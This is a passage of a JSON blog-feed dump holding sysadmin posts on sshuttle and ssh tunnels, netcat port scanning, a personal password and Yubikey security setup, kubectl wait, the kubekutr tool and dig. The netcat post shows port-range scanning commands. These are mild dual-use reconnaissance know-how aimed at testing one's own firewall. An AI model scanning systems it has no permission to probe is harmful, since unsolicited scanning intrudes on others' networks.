tunnels?#\nYes, you can also port forward with ssh using:\nssh -nNT -L \u003Clocal-port>:{upstream-host}:{upstream-port} user@remote\nThe problem with ssh tunnels is that they experience frequent packet loss on a normal WiFi connection and it’s quite frustrating to deal with them. Moreover, sometimes you need access to multiple ports in your private network which requires you to explictly provide them with -L flag which I find it as cumbersome. Also, you cannot forward DNS queries (over UDP) since ssh can only do TCP.\nsshuttle has made my life so simple!\nFin!",[],{"slug":2284,"title":2285,"link":2286,"pubDate":2287,"contentSnippet":2288,"tags":2289,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"netcat-port","Use netcat for port scanning","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnetcat-port\u002F","2020-01-11T02:40:55.000Z","Quite often you’d need to check if a port on a target node is opened or blocked by firewall. I’ve always used telnet to test that but it has a few drawbacks:\nNeed to use dirty hacks in shell scripts to auto close the connection. Also, telnet outputs some errors to \u002Fdev\u002Fstdout instead of the standard \u002Fdev\u002Fstderr which makes it harder to use in scripts.\nNon standard implementation across different OSes. On Alpine Linux (mostly used in containers), if you install telnet using the \u002Fbusybox-extras package, the behaviour is different from what it is on standard Ubuntu\u002FArch environments. I’ve even faced weird issues on Alpine where telnet will simply wait endlessley for the connection to be established, while netcat would not indicate any issues.\nTelnet is actually a protocol and the telnet-client initiates the negotiation with the server before a connection is established.\nSo, after all these issues, I looked at other tools to eventually replace telnet with something better. I tried nmap which is also a port scanner, but is unreliable since a lot of hipster sysadmins drinking the security koolaid block port scanning tools like these. I wanted a dependable tooling and after a bit of Google-fu, I stumbled across netcat.\nnetcat is basically a swiss army knife to perform all kind of ops with TCP\u002FUDP. You can create a file server, chat client\u002Fserver, TCP client etc. We are simply interested in the port scanning abilities of this for this blog post, so let’s actually see how to use it for the same.\nNote: Install netcat-openbsd as it is a rewritten version of netcat-traditional with some more bells and whistles.\nThe basic syntax for port scanning looks like:\nnc -z host port\n-z tells nc to not send any data, just scan for any process listening on the target port. This is much better (and faster) than telnet client initiating a connection with the upstream.\nTo make it more usable however, let’s pepper our command with some helpful flags:\nnc -vz -w 3 host port\n-v turns on verbose mode which outputs diagnostic messages. -w adds the timeout for the connection to be established. If you want to set a timeout in telnet there’s a hack for it.\nYou can even supply a range of ports to netcat like:\nnc -vz -w 3 host 8000-9000\nQuick Tip: You can also give an alias for port instead of the number. For example:\n$nc -vz -w 3 google.com https\nConnection to google.com 443 port [tcp\u002Fhttps] succeeded!\n\n$nc -vz -w 3 google.com ssh\nnc: connect to google.com port 22 (tcp) timed out: Operation now in progress\nnc: connect to google.com port 22 (tcp) failed: Network is unreachable\nHope this post pretty much sums up the usage of netcat for port scanning! Read the man page for more info.\nFin!",[],{"slug":2291,"title":2292,"link":2293,"pubDate":2294,"contentSnippet":2295,"tags":2296,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"security-setup","My Setup: Passwords, 2FA, and Yubikeys","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F01\u002F04\u002Fsecurity-setup\u002F","2020-01-04T00:00:00.000Z","I upgraded my encryption setup recently, so I thought I should write about it,\njust in case it is helpful to someone else. As a security professional, I have a\ndifferent threat model from most folks, and as such my setup does involve a bit\nmore complexity than what I’d recommend to everyone. But if you are an at-risk\nindividual (journalist, person holding hundreds of bitcoins or other digital\nassets, activist) or if you are a linux user with a lot of free time - you might\nconsider duplicating some of this.\n\nI’ll discuss some of the other approaches I’ve considered, and my thought\nprocess around each choice I made. There are general recommendations at the\nbottom of the post.\nPasswords\nI used to be on LastPass till 20171, when I migrated to [pass][pass] (“the\nstandard unix password manager”). With pass, each password lives inside of a gpg\nencrypted file whose filename is the title of the website or resource that\nrequires the password.\npass automatically manages a git repository for you, which I sync against\nGitLab. The one downside of using pass is that the list of my domains is\nvisible to my hosting provider. 2 In the past, I’ve set this up against\nKeybase Encrypted Git (Keybase doesn’t get to see even the file list), and my\nown git-server (only I get to see it).\nI don’t push it to GitHub, since most of my stuff lives on GitHub anyway, and I\ndidn’t want to add my passwords there as well. GitLab uptime is decent enough\nfor my usecase3. Finally, my GitLab account is fairly locked down with:\nzero integrations or third-party apps\nno active personal tokens\nsocial signin disabled\nonly yubikey SSH key configured\nMobile Passwords\nThere are 2 primary considerations I have:\nUsing pass involves GPG keys, and I can’t use hardware GPG keys on my\ncurrent device (iPhone SE).\nI don’t want to sync all my passwords to my phone. I have a limited number of\napplications on my device, and syncing all passwords doesn’t make sense.\nFor the first issue, I am forced to use a PGP key in software on\n[passforios][passforios]. If you are on Android, take a look at\n[OpenKeychain][okc], and Fidesmo\u002FYubikey NFC.\nFor the second issue, I use pass cp, and the .gpg-id file, which allows me\nto maintain a mobile-sync directory inside my pass git repository encrypted\nagainst a different key. From the pass documentation:\n~\u002F.password-store\u002F.gpg-id\nContains the default gpg key identification used for encryption and\ndecryption. Multiple gpg keys may be specified in this file, one per line. If\nthis file exists in any sub directories, passwords inside those sub\ndirectories are encrypted using those keys. This should be set using the init\ncommand.\nMy ~\u002F.password-store\u002Fmobile-sync\u002F.gpg-id file holds 2 keys: My main encryption\nkey, and the key I’ve configured on my phone.\nUnfortunately, I haven’t gotten it working well as a git submodule, so I have a\nhelper script that copies the encrypted password files from mobile-sync\nsubdirectory to a different repository (mobile-passwords.git). The script is\njust 2 lines:\n\ncp -r ~\u002F.password-store\u002Fmobile-sync\u002F*.gpg .\ngit-sync\n\n\nIt updates the git repository, and runs a sync to push any local changes to my\nmobile-passwords repository. I can pull that on my passforios application. I\ncould also clone the entire repo, but the iOS app doesn’t work nicely with a\nsingle-subdirectory approach.\nGPG\npass relies on GPG, and as such I require a strong key setup. I have the\nfollowing:\n2xYubikey 4 (Doesn’t have NFC)\nFidesmo Smartcard, currently unused\nBoth the Yubikeys are configured against my GPG Encryption key. I carry one of\nthe Yubikeys on my keyring with me. The backup Yubikey stays at my home.\nI followed this guide\nwhile configuring the same. As of now, switching between keys is not very\nuser-friendly, but future\nGnuPG versions plan to fix it. The Yubikey holds:\nAn encryption key\nA signing key\nAn authentication key\nI keep a copy of all these keys using\npaperkey as per the same guide.\nI have a subkey backup as well, since Yubikeys are known to fail4.\nSSH\nThe Authentication key in my Yubikey is configured for SSH. I just need to\nensure that my GPG agent is configured for SSH as well:\n\nexport GPG_TTY=\"$(tty)\"\nexport SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)\ngpgconf --launch gpg-agent\n\n\nU2F\nU2F lets me use a physical key as my second-factor on supported websites (as an\nalternative to SMS\u002FTOTP). I configure both of my Yubikeys for U2F wherever\npossible (Twitter\u002FAWS are notable exceptions and only support a single key). U2F\nsupport for [OpenSSH][ssh-u2f] is coming soon. So you can soon authenticate to\nyour server with the Yubikey+PIN, and finish the 2FA with U2F by tapping the\nkey5.\nRoot-of-Identity\nFor most people, the root of identity comes down to ownership of their email\naddress. As such, it is very often the juiciest target for most attackers. I run\nmy mail against Migadu, a privacy friendly swiss\nemail-hosting service. They provide me a management layer for managing my\ndomains which uses my GMail account. (See FAQ for why). I also have 2FA (TOTP\nonly) configured on the Migadu management setup.\nThe domain is currently registered at a Indian registrar (which doesn’t offer\nU2F, but I do have TOTP configured). I would have moved this to CloudFlare, but\nCloudFlare doesn’t support the .in TLD yet.6\nThe email address used for registring the domain again is my GMail. My DNS is\nconfigured on CloudFlare, which again uses my GMail and has appropriate 2FA\nconfigured. (It doesn’t support U2F). So here’s the list of critical providers:\nProvider\n      What can an attacker do\n      Auth\n      2FA\n    \nRegisrar\u002FMitsu\n      Change my nameserver, read any future email, reset passwords\n      GMail\u002FPassword\n      TOTP\n    \nDNS\u002FCloudFlare\n      Change my MX records, read any future emails, reset passwords\n      GMail\u002FPassword\n      TOTP\n    \nEmail\u002FMigadu\n      Reset my email password, read my current emails, reset passwords\n      GMail\u002FPassword\n      TOTP\n    \nGMail\n      Reset passwords for the above 3 accounts\n      Email\u002FPassword\n      U2F\n    \nAs you can see, I end up trusting GMail a lot here.\nRecovery\u002FBackup codes and Security Questions\nI use randomly generated UUIDs as answers to security questions. Currently, I’m\nstoring these for various services within the same password store. As it stands,\nI can’t get access to my password OR recovery token without my Yubikey and PIN.\nThe access Matrix looks like this:\nWhat\n      Physical Access\n      Additional Authentication\n    \nPassword\n      Yubikey\n      PIN\n    \nU2F-2FA\n      Yubikey\n      Physical touch\n    \nTOTP\n      Phone\n      TouchID\n    \nRecovery Code\n      Yubikey\n      PIN\n    \nSecurity Question answers\n      Yubikey\n      PIN\n    \nFailure Scenarios\nThere are lots of failure scenarios with such a setup, and while I’ve got a\npretty spotless record of not getting hacked - I’m not immune to screwups.\nHere’s all the bad things that can happen:\nYubikey failures\nIf my Yubikey fails (or if I forget its PIN), I can’t access passwords on my\ndevice. I still have access to commonly used passwords and my mail on my phone.\nMy backup Yubikey is kept safely at my home. If I lose both, I have the paperkey\nbackup at home (which I should store elsewhere).\nDevice failures\nI have a current version of the password repository against 3 PCs, and a partial\nversion in my mobile. If all these 4 devices fail at once, I can still clone a\nfresh version of the repository with my YubiKey (I would still have GitLab SSH\naccess). I might need to prepare better for this though, since configuring\nGPG-SSH might not always be easy during an incident.\nAs a alternate scenario, my phone GPG key does have my GitLab password, so I can\nclone the repo over HTTPS (with password) if needed.\nCircular dependency against GitLab\nMy GitLab password is randomly generated and stored in the same password store\non GitLab. That is not too big of an issue, because I don’t need the GitLab\npassword anymore to clone my passwords repo, just my Yubikey (for SSH).\nLost Key\nIf I lose my key, the GPG card contains public info, including my email address,\nwhich can be used to contact me. I have a [Tile bluetooth tracker][tile] on my\nkeychain to make it easier for me to find it.\nMalware\nA hardware key doesn’t protect you from all attacks. At the end of the day, my\npasswords must be decrypted by the key and passed unencrypted back to my browser\n(or editor). pass for eg, doesn’t protect against memory scraping attacks. If\nI edit a password on an infected machine, it gets that password.\nIf my browser has a malicious extension, it already has keys to the kingdom. But\nif I then log into a website, it does get access to that password additionaly.\nxkcd 1200 famously illustrates this:\n\nA password vault protected by a hardware key protects against some attacks:\nA malicious extension can’t sniff my vault passphrase, since I don’t have one\nThe key can’t be exfiltrated from hardware.\nHowever, a malware can connect to my authenticated GPG socket, and start\ndecrypting things. To prevent against that, I run my Yubikey in “touch-only”\nmode, so it requires a “physical touch” before it actually does anything, even\nif the PIN is cached. Customizability is\ndependent on your Yubikey model.\nBut remember the xkcd warning - if I have a malware running on my device, it is\npretty much game over anyway. pass doesn’t prevent against memory scraping\nattacks, and actually uses \u002Fdev\u002Fshm to store the temporary plain-text files\ncontaining passwords. Ultimately, your identity is as secure as the device you\ntrust it with.\nImprovements\nIf you have any suggestions for any of the below, I’m\nhappy to hear them.\nTravel Plans\nSince my backup key stays at home, how do I deal with long-term travel? This is\nsomething I’m still figuring out. Do I take my backup Yubikey on my\nlonger-travels? Or should I setup a third-key before I do that? Chances of me\nlosing both the keys together are quite high, so I’m trying to avoid that.\nDomain Ownership\nI’d like to transfer my domain to\na registrar that supports U2F, likely\nNamecheap since I already own some domains there7. If you use CloudFlare,\nthey should roll out\nU2F support soon.\n2FA Recovery Guides\nI wish more organizations published what they consider as valid 2FA recovery\nmechanisms. GitHub supports 2FA recovery by proof of SSH keys or Personal\nTokens; Migadu just needs a few domain names from your account, and lots of\nservices require proof-of-identity.\nA lot of this is undocumented, and I wish organizations were more public about\nthis so users can take appropriate measures and understand their risk better.\nFidesmo Card\nI’m planning to configure my Fidesmo card against my existing GPG\u002FSSH key, so it\nstays in my wallet to improve redundancy. Unfortunately, it is not supported on\niOS, so I plan to get a NFC reader\u002Fwriter and test that out. This also helps\nwith travel plans a bit, since I’m less likely to lose my wallet\nanecdotally(which also has [a bluetooth tracker][slim]).\nU2F on iPhone\nU2F support on Mobile Safari is non-existent. Brave recently added support for\nthe upcoming Yubikey 5Ci, which supports both USB-C and lightning. However, this\nrequires a special Yubikey SDK, which breaks the idea of U2F being\ninteroperable. The 5Ci is also quite costly at $70. I don’t know of any\napplication that is actually supporting GPG-over-Yubikey-over-lightning.\nCompare this to Android where NFC based smartcards or Yubikeys just work. I’d\nlike that to happen with iPhones.\nFull Disk Encryption using a Yubikey\nIt is possible to configure\nFull Disk Encryption with Yubikeys,\nbut I haven’t tried it yet.\n2FA on my email account\nMigadu currently does not support 2FA on webmail access, just on\nmanage.migadu.com. This is very unfortunate, but I’m told this is planned soon\n(January 2020).\nRecovery\u002FBackup codes and Security Questions\nMy current setup of saving recovery codes alongside passwords isn’t optimal, but\nI don’t have a better way either. I’ve considered keeping my recovery codes on a\nalternate password store (such as bitwarden, or keypassX), but I’ll have to\nmemorize the password, and setup a separate 2FA for it to be truly\nfault-tolerant.\nFAQ\nWhy do you have stuff configured on your GMail? Aren’t you anti-Google?\nDespite all the flak that Google gets for privacy, their security team is pretty\nawesome. Your account is pretty much unhackable once you are enrolled into their\nAdvanced Protection Program. The few security-sensitive places where I use it\nare:\nDomain Registration\nEmail Management\nDNS Configuration\nEverywhere else, I use my actual domain (captnemo.in) to ensure nothing else\nroutes over GMail. Using GMail for the above 3 ensures that I don’t have a\ncircular dependency. If I were to lose my main email password, I can recover via\nmultiple ways:\nChange DNS to another email provider.\nReset password via migadu admin panel.\nEnsuring that either of these workflows do not rely on the same email account\nI’ve just lost access to is vital. Another alternative is to use a\ntrusted-friend (ideally someone more paranoid than me) as a proxy for these\nemails, and use their domain for managing these 2 services. Might get around to\nit someday.\nMy GMail recovery email is set to my main account, so it creates a circular\ndependency, but one that I actually want.\nWhat do you recommend I use?\nBitwarden for password management.\n2xHyperFIDO Mini U2F Keys configured for second\nfactor against as many accounts as possible.\nU2F is not only safer, but much more convenient than TOTP\u002FSMS based 2FA. For\niPhone\u002FUSB-C users, see\nthe Yubico website.\nIf you don’t like to pay the USB-C tax, there are cheap\nUSB-C to miniUSB\nadapters that can work with the HyperFIDO key and fit on your keychain. If you\naren’t convinced on why this is a good idea, see\nthis guide. The\nsecond key is just a backup key, and could be the primary key used by your\nspouse, friends or co-workers.\nA PIN configured on all your SIMs. Instructions for\niPhone,\nAndroid.\nFull-Disk-Encryption on all your devices. Instructions for\nWindows,\nMac,\nArchLinux,\nFedora,\nUbuntu.\nUse randomly generated passwords everywhere. Trust your password manager on\nthis.\nSetup a PIN on your WhatsApp.\nIf you own a lot of cryptocurrency, use a hardware wallet and put it in a bank\nsafe. Have a backup one, in another safe. You can put the PIN for those in\nyour password store. I haven’t researched enough to suggest you which\nwallet(s).\nGet a SIM without an Aadhaar, to make SIM-Jacking attackes harder (applies in\nIndia).\nGo through securityplanner.org, which gives\nyou personalized recommendations customized for our risk profile. I agree with\nmost of their recommendations8\nSignup for breach notifications against your email at\nhttps:\u002F\u002Fhaveibeenpwned.com\u002F.\nIf you’d like to get off GMail, pay for FastMail.\nAlternatively, if I know you in real-life, I’m happy to host your mail in my\nMigadu account. (Only works if you know me well enough to trust me)\nWhy are you so paranoid?\nI work in infosec. Breaking things comes naturally to me, and I plan for\ndefense-in-depth. Plus, I’d be a terrible security person if I got hacked.\nWhy not recommend open source keys instead?\nAvailability is a pain point, especially if you aren’t in the US. Even getting\nmy hands on a SoloKey was hard, despite backing it on KickStarter.\nOnlyKey also makes some claims regarding open source,\nbut I can’t find their schematics anywhere.\nSoloKey is great, and what I’d recommend, but\nit doesn’t support OpenPGP yet.\n[NitroKey Start][nitrokey-start] is\napparently completely FOSS,\nso you might wanna check that.\nThe HyperFIDO keys are compliant to the U2F\u002FFIDO standards, and I’ve not faced\nany issues while using them. They’re cheap and widely available. Unless you need\nGPG, go for it.\nThanks to Giridharan, Santosh, and Akshay for reviewing drafts of this\nand offering valuable suggesions. If you have any suggestions, happy to hear\nthem\n[passforios]:\n  https:\u002F\u002Fmssun.github.io\u002Fpassforios\u002F\n  “Open Source, no-network, minimalist pass client for iOS”\n[okc]: https:\u002F\u002Fwww.openkeychain.org\u002F\n[pass]: https:\u002F\u002Fpasswordstore.org\n[tile]: https:\u002F\u002Fwww.thetileapp.com\u002Fen-us\u002F\n[slim]:\n  https:\u002F\u002Fwww.thetileapp.com\u002Fen-us\u002Fstore\u002Ftiles\u002Fslim\n  “I have the older version of the Tile Slim”\n[ssh-u2f]:\n  https:\u002F\u002Fwww.undeadly.org\u002Fcgi?action=article;sid=20191115064850\n  “Does it really count as 2FA if both your SSH and U2F is the same device?”\n[nitrokey-start]: https:\u002F\u002Fshop.nitrokey.com\u002Fshop\u002Fproduct\u002Fnitrokey-start-6\nI moved away from Lastpass after Tavis Ormandy reported a RCE vulnerability\non their browser extension. Their wikipedia page mentions 2 breaches, and 3\nsecurity incidents. It has never undergone a security audit (unlike\nbitwarden) and is not something I recommend anymore. ↩\nThe pass-tomb extension bypasses\nthis limit and encrypts your filenames as well. ↩\nI have my own git server configured\nas a fallback if it goes down. I ensure the same controls on my Git server\nas Gitea, and it runs in my living room. ↩\nI lost my previous GPG key because my Yubikey stopped working ↩\nThe jury is still out on whether this counts as an “independent second\nfactor”. ↩\nThe domain is stuck in a legal limbo, because of an\nongoing case between my registrar and NIXI\n(which runs the .in registry). If you have any suggestions\u002Fideas, please\nreach out. ↩\nNamecheap announced\nU2F support\nin April 2019, and while it was buggy at first, it has definitely improved. ↩\nThe one major exception is lastpass, which I no longer recommend. ↩",[],{"slug":2298,"title":2299,"link":2300,"pubDate":2301,"contentSnippet":2302,"tags":2303,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"kubectl-wait","kubectl wait","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fkubectl-wait\u002F","2020-01-01T02:40:55.000Z","For the longest time I’ve had these commands in my .gitlab-ci.yml file for a K8s CD pipeline:\n    ...\n    - kubectl apply -k overlays\u002Fprod\n    - echo \"Waiting for 15 seconds for pods to be restarted\" && sleep 15\n    - kubectl get po\n    ...\nSo, basically I apply the changes to cluster using kubectl apply and wait for arbitary decided time (15 seconds) to see the pod status, hoping by that time the new deployments would have been active and old pods would be deleted. As the traditional SRE saying goes Hope is not a strategy this was clearly hacky and I knew it back then, just didn’t priortise enough to find a replacement. Recently got to know about kubectl wait and woah, this is exactly what I needed. I can wait till either the condition is true or a timeout happens, whichever is earlier. This is so much better than the previous hack.\nkubectl wait --for=condition=available --timeout=60s --all deployments\nHere the condition depends on the resource you are selecting. You can see the values for Conditions using kubectl describe \u003Cresource>. For eg, for deployment and pods:\n$ kc describe deployments\u002F{deployment_name} | grep Conditions -A 5\n\nConditions:\n  Type           Status  Reason\n  ----           ------  ------\n  Progressing    True    NewReplicaSetAvailable\n  Available      True    MinimumReplicasAvailable\n$ kc describe pods\u002F{pod_name} | grep Conditions -A 5\n\nConditions:\n  Type              Status\n  Initialized       True\n  Ready             True\n  ContainersReady   True\n  PodScheduled      True\nSo, now you’ll set the value for condition according to your choice. This will be pretty useful in CI\u002FCD pipelines. That’s pretty much it.\nUnrelated, but I thought about doing more such short posts and be consistent with more of writing. If you liked the short and precise format or have any feedback on it, do reach out to me on Twitter.\nHappy New Year :)\nFin!",[],{"slug":2305,"title":2306,"link":2307,"pubDate":2308,"contentSnippet":2309,"tags":2310,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"introducing-kubekutr","Introducing kubekutr","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fintroducing-kubekutr\u002F","2019-12-30T02:40:55.000Z","kubekutr was born out of my frustration of organising K8s resource manifests files\u002Fdirectories. For the uninitiated, K8s lets you hold the state of your cluster declaratively as “manifest” files. K8s does so by a lot of asynchronous control loops to check whether the desired state matches the real world state and in case of drifts, it resets back to the user desired state (I oversimplified this, but hope you get the drift ;)). These files are predominantly YAML but there’s support for JSON as well. Anyway, to create these manifest files for a production level project is quite a bit of manual labour. The API spec of every resource in Kubernetes is quite daunting and overwhelming. There are tools like Helm which abstract away the complexity of these YAML with it’s own templating system. There are quite a lot of these charts available for 3rd party apps here. The idea is you populate the Chart with just your own config “values” and you’ve a deployment ready in no time. Admittedly this works quite well for something you want to take out for a quick spin but personally I am not quite a fan of hiding away the complexity with a magic layer. Also, the problem with Helm was the “Chart” (and templates) still had to be written by someone if you have a bespoke application. Helm is more geared towards common off the shelf apps like DBs, Key Value stores, web proxies etc.\nI found out kustomize few months back and quite happy with it’s approach towards managing manifests. The basic idea behind kustomize is that you create a base and any kind of “customisations” must come as overlays. This is such a powerful technique over wrangling templates. kustomize A common approach is to name these overlays based on the environment. For example, dev deployment can have replicas: 1 for a pod, but prod can apply a “patch” to update with repliacs: 3. This way of separating two environments helps a lot when you follow GitOps approach of deployment. All fine and good, until I realised I spent way too much time on copy-pasting the bases for different projects and manually editing these files for the new project config.\nThen I did what any other programmer would do, spend some more time to automate :P And that is how kubekutr was born. (Quite an anticlimax I know!)\nkubekutr is a really simple tool to bootstrap a Kustomize base. kubekutr reads a config file, templates out different resources and produces them as YAML files. Now, I know a lot of you reading this would be going Another damn templating solution in your mind and while that reaction is warranted, given that we have 200+ tools in the community (everyone trying to solve similar problems in their own ways), I legit could not find a simple enough tool which would let the boring part of scaffolding a base out of my way and let me focus on what’s more important: the actual deployment. Hence I just decided to roll out my own solution which is the best one according to IKEA effect (just kidding).\nWorkflow#\nSo, let’s say you need to create a Nginx deployment, the kubekutr config.yml would look something like this:\ndeployments:\n  - name: nginx\n    replicas: 1\n    labels:\n      - name: 'service: nginx'\n    containers:\n      - name: nginx\n        image: 'nginx:latest'\n        portInt: 80\n        portName: nginx-port\nservices:\n  - name: nginx\n    type: ClusterIP\n    port: 80\n    targetPort: 80\n    labels:\n      - name: 'service: nginx'\n    selectors:\n      - name: 'service: nginx'\nTo create the base:\nkubekutr -c config.yml scaffold -o nginx-deployment\nnginx-deployment folder is initialised and you can view deployments\u002Fnginx.yml and service\u002Fnginx.yml which kubekutr created.\n$ tree nginx-deployment\n\n|-- base\n|   |-- deployments\n|   |   `-- nginx.yml\n|   |-- ingresses\n|   |-- services\n|   |   `-- nginx.yml\n|   `-- statefulsets\n$ cat base\u002Fdeployments\u002Fnginx.yml\n\napiVersion: apps\u002Fv1\nkind: Deployment\nmetadata:\n  name: nginx\n  labels:\n    service: nginx\nspec:\n  replicas: 1\n  selector:\n    matchLabels:\n      service: nginx\n  template:\n    metadata:\n      labels:\n        service: nginx\n    spec:\n      containers:\n        - name: nginx\n          image: nginx:latest\n          ports:\n          - containerPort: 80\n            name: nginx-port\n$ cat base\u002Fservices\u002Fnginx.yml\n\napiVersion: v1\nkind: Service\nmetadata:\n  name: nginx\n  labels:\n    service: nginx\nspec:\n  ports:\n    - port: 80\n      targetPort: 80\n      protocol: TCP\n  type: ClusterIP\n  selector:\n    service: nginx\nYou can now use the generated folder as a Kustomize base.\nNon Goals#\nkubekutr isn’t meant to replace the existing tools, it’s just a real simple cookie cutter approach to kustomize bases and that’s pretty much it. kustomize is native to Kubernetes and exposes the full API spec to end users. I feel that is much more better approach than templating solutions, the users must be exposed to the standard conventions rather than a random tool’s own config fields. The benefits are the same conventions can then be used across a wide variety of tools (like kubekutr) and users are in better control of the underlying resources. Adding a layer of magic also makes it harder to debug when shit goes down. Hence kubekutr chose kustomize to do all the heavy lifting of managing manifests.\nThere’s a lot of scope of improvements, but I wanted to just Ship It! and get some initial feedback. Let me know your thoughts on this :)\nFin!",[],{"slug":2312,"title":2313,"link":2314,"pubDate":2315,"contentSnippet":2316,"tags":2317,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"dig-overview","A quick primer on dig","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdig-overview\u002F","2019-11-11T05:27:55.000Z","Dig is a DNS lookup utility developed by BIND which helps a lot while troubleshooting DNS issues (which are more common than you probably think #hugops). I use dig fairly often and thought to write an introductory guide on how you can use dig with some practical examples that’ll help you dig through DNS issues faster (sorry for the lame pun, couldn’t resist.)\nBasics#\nThe most basic and common usage for dig is to query the authorative servers for a particular domain and retrieve the IP. If it’s an IPv4 then you should be looking at A record, while if it’s IPv6 then AAAA record is your friend. Let’s see the DNS records for the site you’re currently on:\n➜  ~ dig mrkaran.dev\n\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> mrkaran.dev\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: NOERROR, id: 23292\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 1220\n;; QUESTION SECTION:\n;mrkaran.dev.\t\t\tIN\tA\n\n;; ANSWER SECTION:\nmrkaran.dev.\t\t60\tIN\tA\t206.189.89.118\n\n;; Query time: 6 msec\n;; SERVER: 127.0.0.1#53(127.0.0.1)\n;; WHEN: Tue Oct 29 23:13:31 IST 2019\n;; MSG SIZE  rcvd: 67\n\nThis is the most basic example for dig. Let’s explore some of the additional options.\nKeep it short#\ndig +short keeps the information to bare minimum and only displays the ANSWER.\ndig +short mrkaran.dev\n206.189.89.118\nNameserver details#\nIf you want to find the Nameserver for your DNS records, you can use the query type ns.\n$ dig mrkaran.dev ns +short\nalec.ns.cloudflare.com.\ncruz.ns.cloudflare.com.\nns is one of the many query types you can use to indicate which type of DNS record you want to fetch. Default is A record which returns the IPv4 address of the domain (unless it’s a root domain, in which case the default query type is NS). Some other examples of query types are mx, AAAA, TXT etc.\nFun Fact: ANY query type has become obsolete as per the new RFC8482 and DNS operators can choose to not respond to this query. The reason for this is that the payload response size for an ANY query is quite huge (since it has to return all type of DNS records) and this could affect the performance of authoritative servers in case of a DNS amplification attack.\nUsing different DNS server#\nLet’s say you want to switch to a different resolver, you can use @ followed by the address of your DNS server.\n$ dig mrkaran.dev @9.9.9.9\nReverse DNS Lookup#\nThis one’s actually pretty cool. dig -x lets you query the IP and retrieve the hostname details for that IP.\ndig -x 206.189.89.118\nMultiple queries#\nYou can input a list of domain names and pass the file with the arg -f to dig.\n$ cat digfile\nmrkaran.dev\njoinmastodon.org\nzoho.com\nTo list down all MX records for the domains in a file, you can use something like:\n$ dig -f digfile +noall mx +answer\nmrkaran.dev.\t\t242\tIN\tMX\t10 mx.zoho.in.\nmrkaran.dev.\t\t242\tIN\tMX\t20 mx2.zoho.in.\nmrkaran.dev.\t\t242\tIN\tMX\t50 mx3.zoho.in.\njoinmastodon.org.\t21599\tIN\tMX\t10 in1-smtp.messagingengine.com.\njoinmastodon.org.\t21599\tIN\tMX\t20 in2-smtp.messagingengine.com.\nzoho.com.\t\t299\tIN\tMX\t10 smtpin.zoho.com.\nzoho.com.\t\t299\tIN\tMX\t20 smtpin2.zoho.com.\nzoho.com.\t\t299\tIN\tMX\t50 smtpin3.zoho.com.\nSearch List#\nI learnt this recently while debugging a DNS issue in one of the Kubernetes pods. Dig doesn’t use search paths by default, so if you have a service say redis inside a namespace dig won’t fetch any result:\n$ dig redis +short\n# empty output, indicates no record found\nThis is because a service name in Kubernetes is of the form service.namespace.svc.cluster.local. So, we should actually be querying for redis.myns.svc.cluster.local and we’ll get our result. But isn’t that too long and painful (sorry for the pun) to type?\nSo, there’s another option +search which can be used to find all domains matching the search path defined in \u002Fetc\u002Fresolv.conf namesever configurations.\n$ cat \u002Fetc\u002Fresolv.conf\nnameserver 10.100.0.10\nsearch myns.svc.cluster.local svc.cluster.local cluster.local\nWe can now query for redis with this search list:\ndig redis +search +short\n10.100.32.73\nDNSSec Validation#\ndig even lets you validate the DNS records you received using DNSSEC validation.\n$ dig mrkaran.dev +dnssec\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> mrkaran.dev +dnssec\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: NOERROR, id: 36275\n;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags: do; udp: 1452\n;; QUESTION SECTION:\n;mrkaran.dev.\t\t\tIN\tA\n\n;; ANSWER SECTION:\nmrkaran.dev.\t\t20\tIN\tA\t178.128.17.49\nmrkaran.dev.\t\t20\tIN\tRRSIG\tA 13 2 20 20191112173050 20191110153050 34505 mrkaran.dev. Tl3zD6EqfVRvZi79ahePQcAXnbSUY9ZEYx\u002FKwXnDUyonlrCKuBHzIYYC MJoVns410+sOwbIrcAdLgx+eiMYqRQ==\n\n;; Query time: 65 msec\n;; SERVER: 1.1.1.1#53(1.1.1.1)\n;; WHEN: Mon Nov 11 22:01:01 IST 2019\n;; MSG SIZE  rcvd: 163\nThe important bit to note here is the ad flag set which represents Authenticated Data. The records will only be returned if the validation succeeds (unless you also specify +cd which indicates Checking Disabled flag.)\nOn a server which doesn’t have DNSSEC enabled, you can see no records are returned with the +dnssec flag.\n$ dig dnssec-failed.org +dnssec\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> dnssec-failed.org +dnssec\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: SERVFAIL, id: 19886\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;dnssec-failed.org.\t\tIN\tA\n\n;; Query time: 335 msec\n;; SERVER: 1.1.1.1#53(1.1.1.1)\n;; WHEN: Mon Nov 11 22:03:50 IST 2019\n;; MSG SIZE  rcvd: 35\nThat pretty much broadly covers some practical examples with dig. I will soon write a detailed post on how DNSSEC validation works and why it needs to be mainstream.\nFin!",[],{"slug":2319,"title":2320,"link":2321,"pubDate":2315,"contentSnippet":2322,"tags":2323,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gitops-kubernetes","GitOps approach to Continuous Delivery for 